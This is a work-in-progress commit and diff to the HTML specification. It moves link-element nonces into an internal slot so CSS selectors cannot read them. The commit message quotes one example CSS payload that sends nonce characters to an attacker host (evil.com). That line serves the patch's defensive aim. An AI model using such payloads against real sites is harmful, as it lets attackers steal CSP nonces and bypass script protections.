WIP: Hide nonce content attribute values. (#2369)

We've seen some recent attacks on CSP which rely on the ability to
exfiltrate nonce data via various mechanisms that can grab data from
content attributes. CSS selectors are the best example: through clever
use of prefix/postfix text matching selectors values can be sent out
to an attacker's server for reuse (e.g.
`script[nonce=a] { background: url("https://evil.com/nonce?a");}`).

This patch makes some changes to mitigate this risk by hiding the nonce
value from relevant element's content attributes:

1.  When parsing an element with a `nonce` attribute, the content
    attribute's value is copied into an internal slot on the element, and
    overwritten with the empty string.

2.  The `nonce` IDL attribute's getter returns the value of the internal
    slot, and its setter updates the internal slot's value.

3.  The internal slot's value is used to populate the cryptographic
    nonce metadata used by Fetch when making requests.

WIP: This patch doesn't actually do the above yet. It only adjusts
the <link> element in the hopes of sparking conversation about how this
feature should actually work. Does it look reasonable? Should we
replicate the steps for each element type that has a nonce, or move it
up the chain to something like Node?

source

@@ -2402,6 +2402,7 @@ a.setAttribute('href', 'https://example.com/'); // change the content attribute
      <li><dfn data-x="converted to ASCII lowercase" data-x-href="https://infra.spec.whatwg.org/#ascii-lowercase">ASCII lowercase</dfn></li>
      <li><dfn data-x="converted to ASCII uppercase" data-x-href="https://infra.spec.whatwg.org/#ascii-uppercase">ASCII uppercase</dfn></li>
      <li><dfn data-x-href="https://infra.spec.whatwg.org/#ascii-case-insensitive">ASCII case-insensitive</dfn></li>
+     <li><dfn data-x-href="https://infra.spec.whatwg.org/#iteration-break">break</dfn></li>
      <li><dfn data-x-href="https://infra.spec.whatwg.org/#strip-newlines">strip newlines</dfn></li>
      <li><dfn data-x-href="https://infra.spec.whatwg.org/#strip-leading-and-trailing-ascii-whitespace">strip leading and trailing ASCII whitespace</dfn></li>
      <li><dfn data-x-href="https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespace">strip and collapse ASCII whitespace</dfn></li>
@@ -12380,6 +12381,23 @@ interface <dfn>HTMLLinkElement</dfn> : <span>HTMLElement</span> {
   to determine whether or not an external resource specified by the link will be loaded and applied
   to the document. The value is text. <ref spec="CSP"></p>
 
+  <p>Each <code>link</code> element has a <dfn data-export="" data-dfn-for="link"
+  data-dfn-type="attribute">[[Cryptographic Nonce]]</dfn> internal slot. When a <code>link</code>
+  element <span>becomes connected</span>, this slot must be <span>immediately</span> set by
+  executing the following steps on the <var>element</var>:</p>
+
+  <ol>
+   <li>If <var>element</var> has no <code data-x="attr-link-nonce">nonce</code> content attribute,
+   set <var>element</var>'s <code>[[Cryptographic Nonce]]</code> to the empty string, then
+   <span>break</span>.</li>
+
+   <li>Set <var>element</var>'s <code>[[Cryptographic Nonce]]</code> to the value of
+   <var>element</var>'s <code data-x="attr-link-nonce">nonce</code> content attribute.</li>
+
+   <li>Set <var>element</var>'s <code data-x="attr-link-nonce">nonce</code> content attribute's
+   value to the empty string.</li>
+  </ol>
+
   <p>The <dfn data-export="" data-dfn-for="link" data-dfn-type="element-attr"><code
   data-x="attr-link-integrity">integrity</code></dfn> attribute represents the <span
   data-x="concept-request-integrity-metadata">integrity metadata</span> for requests which this
@@ -12429,8 +12447,8 @@ interface <dfn>HTMLLinkElement</dfn> : <span>HTMLElement</span> {
    <span>environment settings object</span>.
 
    <li><p>Set <var>request</var>'s <span data-x="concept-request-nonce-metadata">cryptographic
-   nonce metadata</span> to the current value of the <code>link</code> element's <code
-   data-x="attr-link-nonce">nonce</code> content attribute.</p></li>
+   nonce metadata</span> to the current value of the <code>link</code> element's
+   <code>[[Cryptographic Nonce]]</code> internal slot.</p></li>
 
    <li><p>Set <var>request</var>'s <span data-x="concept-request-integrity-metadata">integrity
    metadata</span> to the current value of the <code>link</code> element's <code
@@ -12688,12 +12706,16 @@ interface <dfn>HTMLLinkElement</dfn> : <span>HTMLElement</span> {
   data-x="dom-link-rel">rel</code></dfn>, <dfn><code data-x="dom-link-as">as</code></dfn>,
   <dfn><code data-x="dom-link-media">media</code></dfn>, <dfn><code
   data-x="dom-link-hreflang">hreflang</code></dfn>, <dfn><code
-  data-x="dom-link-type">type</code></dfn>, <dfn><code data-x="dom-link-nonce">nonce</code></dfn>,
-  <dfn><code data-x="dom-link-integrity">integrity</code></dfn>, <dfn><code
+  data-x="dom-link-type">type</code></dfn>, <dfn><code
+  data-x="dom-link-integrity">integrity</code></dfn>, <dfn><code
   data-x="dom-link-sizes">sizes</code></dfn>, and <dfn><code
   data-x="dom-link-scope">scope</code></dfn> each must <span>reflect</span> the respective content
   attributes of the same name.</p>
 
+  <p>The <dfn><code data-x="dom-link-nonce">nonce</code></dfn> IDL attribute, on getting, returns
+  the value of the <code>[[Cryptographic Nonce]]</code> internal slot; and, on setting, changes the
+  value of the <code>[[Cryptographic Nonce]]</code> to the given value.</p>
+
   <p>The <dfn><code data-x="dom-link-crossOrigin">crossOrigin</code></dfn> IDL attribute must
   <span>reflect</span> the <code data-x="attr-link-crossorigin">crossorigin</code> content attribute.</p>